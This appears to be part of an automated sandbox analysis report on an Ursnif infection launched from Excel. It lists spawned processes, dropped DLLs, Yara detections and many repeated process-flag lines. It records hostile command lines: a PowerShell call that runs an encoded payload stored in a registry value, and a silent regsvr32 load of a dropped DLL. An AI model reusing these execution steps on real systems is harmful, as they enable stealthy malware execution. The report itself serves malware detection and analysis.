Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a2r2fkec\a2r2fkec.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a2r2fkec\a2r2fkec.cmdline'

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\Users\Public\Documents\decrypt.dll

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001E7A60 push ecx; ret	3_2_001E7A69
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_001E7DCF push ecx; ret	3_2_001E7DDF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 19_2_00FB7A60 push ecx; ret	19_2_00FB7A69
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 19_2_00FB7DCF push ecx; ret	19_2_00FB7DDF

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\app[1].dll			Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\Public\Documents\decrypt.dll			Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 19.3.regsvr32.exe.56b94a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.regsvr32.exe.4d894a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000003.508793933.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.508759247.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.508819476.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.411957077.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.508778168.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.411794580.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.411858229.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.411885260.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.472132410.0000000004B0E000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.531333562.000000000553C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.508710785.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.411972809.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.429184025.0000000004C0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.428651984.0000000004D89000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.520271501.00000000056B9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.508809489.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.411764136.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.411824879.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.508736134.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.508679200.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.411905435.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 5236, type: MEMORY

Source: C:\Windows\SysWOW64\regsvr32.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
